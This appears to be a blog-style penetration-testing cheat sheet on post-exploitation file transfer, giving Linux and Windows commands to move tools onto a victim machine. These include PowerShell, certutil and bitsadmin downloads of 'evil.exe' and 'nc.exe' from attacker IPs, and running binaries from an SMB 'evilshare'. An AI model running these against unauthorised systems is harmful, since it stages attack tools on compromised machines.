File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:
Linux
HTTP
If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.
# Setup http server in Host machine:
## Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080
## php
php -s localhost:8080
## Apache
### For this, you need to copy the file you want to transfer to the directory '/var/www/html' then enable apache service
service apache2 start
Now you can download the files on the target machine as follows.
wget http://<your_hosts_ip>/<file_name>
curl http://<your_hosts_ip>/<file_name> > file
curl -O http://<your_hosts_ip>/<file_name>
Netcat
If netcat is installed on the target machine, we can use it to transfer files.
# First, set up the netcat on target machine to listen for the incoming request.
nc -nvlp 8080 > file
# then send the desired file from your host machine
nc $target_ip 8080 < file
SCP
If you have SSH access to the target machine, you can transfer files using SCP as follows:
## Copy the file:
scp /path/to/source/file.ext username@<target_ip>:/path/to/destination/file.ext
## Copy Directory:
scp -r /path/to/source/dir username@<target_ip>:/path/to/destination
Windows
HTTP
Even though Windows doesn't have wget, we can use other options to download files via HTTP. Some of them are:
Powershell
powershell Invoke-WebRequest -Uri http://[vpnIP]:[LPORT2]/Message.exe -Outfile Message.exe
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe');
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.x/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.x/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.x/nc.exe" -outfile "c:\temp\nc.exe"
Certutil
certutil.exe -urlcache -split -f http://<host_ip>:<port>/file file
Bitsadmin
bitsadmin /transfer evil /download /priority high http://<target_ip>:<port>/file %temp%\file
SMB
The easiest method to transfer files between Linux and Windows is SMB since it doesn't require any special configuration or commands, and SMB is built-in on every Windows machine. You can also execute any binary on SMB without needing to copy it over the target machine.
First, start an smb share on your host machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py evilshare .
smbserver.py
may defer from mine depending on your impacket installation.You can test if the SMB share is up using net view
command on windows.
net view \\<host_ip>
Now you can copy files from share to the target machine using copy
or move
and vice versa.
## In target machine download the file using copy
copy \\ip-addr\share-name\file out-file
## to transfer file from target machine to local machine
copy file_name \\ip-addr\share-name
or you can execute the binary directly from the share without copying
\\<target_ip>\share-name\binary.exe
FTP
FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.
Install a python library called pyftpdlib
.
sudo apt-get install python3-pyftpdlib
Start an FTP server with:
python3 -m pyftpdlib
# By default, the ftp server runs on port 2121 and accepts anonymous authentication
# you can specify the ports using -p argument
# you can also give write access to anonymous user with -w
If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port>
and use the credentials anonymous. If you don't have an interactive shell, create a text file with the following content.
open <host_ip> <port>
anonymous
anonymous
binary # remove this line if the file you want to transfer is not binary
get binary_name.exe
bye
Now, simply run ftp -s:filename.txt
, and it will download the file you specified.
TFTP
TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available (you can also enable it with pkgmgr /iu:"TFTP"
) on the target machine, you can start a TFTP server on your machine with:
service atftpd start
and get files from the target machine with:
tftp -i <host_ip> GET binary.exe
These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.